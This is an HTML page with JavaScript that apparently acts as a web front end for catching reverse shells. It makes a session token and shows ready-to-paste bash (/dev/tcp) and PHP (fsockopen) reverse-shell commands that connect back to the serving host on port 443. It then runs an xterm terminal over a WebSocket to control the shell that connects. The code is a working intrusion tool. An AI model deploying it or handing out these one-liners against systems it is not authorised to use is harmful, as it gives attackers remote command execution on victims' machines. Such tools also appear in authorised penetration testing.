<!DOCTYPE html>
<html>
<head>
    <title>Terminal</title>
    <link rel="stylesheet" href="/static/xterm.css">
    <script src="/static/xterm.js"></script>
    <script src="/static/addons/fit/fit.js"></script>
    <script type="text/javascript">
        function token(length) {
            var result = [];
            var characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
            var charactersLength = characters.length;
            for (var i = 0; i < length; i++) {
                result.push(characters.charAt(Math.floor(Math.random() *
                    charactersLength)));
            }
            return result.join('');
        }

        function main() {
            prefix = "";
            protocol = "ws";
            if (location.protocol === "https:") {
                protocol = "wss";
            }
            token = token(16);
            Terminal.applyAddon(fit);
            term = new Terminal();
            term.open(document.getElementById('terminal'));
            term.fit();
            term.writeln("token: " + token);
            term.writeln("bash: bash -c \"(echo " + token + ";bash -i) >& /dev/tcp/" + prefix + window.location.hostname + "/443 0>&1\"");
            term.writeln("php: php -r '$sock=fsockopen(\"" + prefix + window.location.hostname + "\",443);exec(\"(echo " + token + ";/bin/bash -i) <&3 >&3 2>&3\");'");
            var conn;
            var ctrl = false;
            var alt = false;
            var shift = false;
            terminal.onkeypress = function (e) {
                if (!e) e = window.event;
                ;
                var keyCode = e.keyCode || e.which;
                if (e.keyCode === 45 && e.charCode === 0) { //detect ins
                    return;
                }
                conn.send(String.fromCharCode(keyCode));
            };

            terminal.onkeyup = function (e) {
                if (!e) e = window.event;
                var keyCode = e.keyCode || e.which;

                if (ctrl && keyCode === 67) {// Ctr + C
                    conn.send(String.fromCharCode(3));
                    return;
                }

                if (keyCode === 8) {
                    conn.send(String.fromCharCode(8));
                    return;
                }

                if (keyCode === 27) {
                    conn.send(String.fromCharCode(27));
                    return;
                }

                if (keyCode === 9) {
                    conn.send(String.fromCharCode(9));
                    return;
                }
                if (keyCode === 17) {
                    ctrl = false;
                    return;
                }
                if (keyCode === 16) {
                    shift = false;
                    return;
                }
                if (keyCode === 18) {
                    alt = false;
                    return;
                }

                if (keyCode === 37) {//arrow
                    conn.send(String.fromCharCode(27) + String.fromCharCode(91) + String.fromCharCode(68));
                    return;
                }
                if (keyCode === 38) {//arrow
                    conn.send(String.fromCharCode(27) + String.fromCharCode(91) + String.fromCharCode(65));
                    return;
                }
                if (keyCode === 39) {//arrow
                    conn.send(String.fromCharCode(27) + String.fromCharCode(91) + String.fromCharCode(67));
                    return;
                }
                if (keyCode === 40) {//arrow
                    conn.send(String.fromCharCode(27) + String.fromCharCode(91) + String.fromCharCode(66));
                    return;
                }

            };
            terminal.onkeydown = function (e) {
                if (!e) e = window.event;
                var keyCode = e.keyCode || e.which;

                if (keyCode === 18) { // alt
                    e.preventDefault();
                    alt = true;
                }

                if (keyCode === 17) { //Ctr
                    ctrl = true;
                }

                if (keyCode === 16) { // shift
                    shift = true;
                }

                if (keyCode === 9) { // tab
                    e.preventDefault();
                    conn.send(String.fromCharCode(keyCode));
                }
            };

            term.on('paste', function (data, ev) {
                conn.send(data);
            });

            if (window["WebSocket"]) {
                var connected = false;
                conn = new WebSocket(protocol + "://" + window.location.hostname + "/ws");
                conn.binaryType = "arraybuffer";
                conn.onopen = function (evt) {
                    conn.send(token);
                };

                conn.onclose = function (evt) {
                    console.log(evt);
                };
                conn.onmessage = function (evt) {
                    if (connected == false) {
                        term.reset();
                    }
                    connected = true;
                    var buff = new Uint8Array(evt.data)
                    for (var i = 0; i < buff.length; i += 1) {
                        if (buff[i] === 10) {
                            // crlf
                            term.write(String.fromCharCode(13))
                        }
                        term.write(String.fromCharCode(buff[i]))
                    }
                };
            }
        };
    </script>
</head>
<body onload="main()">
<div class="main">
    <div class=fakeMenu>
        <div class="fakeButtons fakeClose"></div>
        <div class="fakeButtons fakeMinimize"></div>
        <div class="fakeButtons fakeZoom"></div>
    </div>
    <div id="terminal">
    </div>
    <div>
    </div>
</div>
</body>
</html>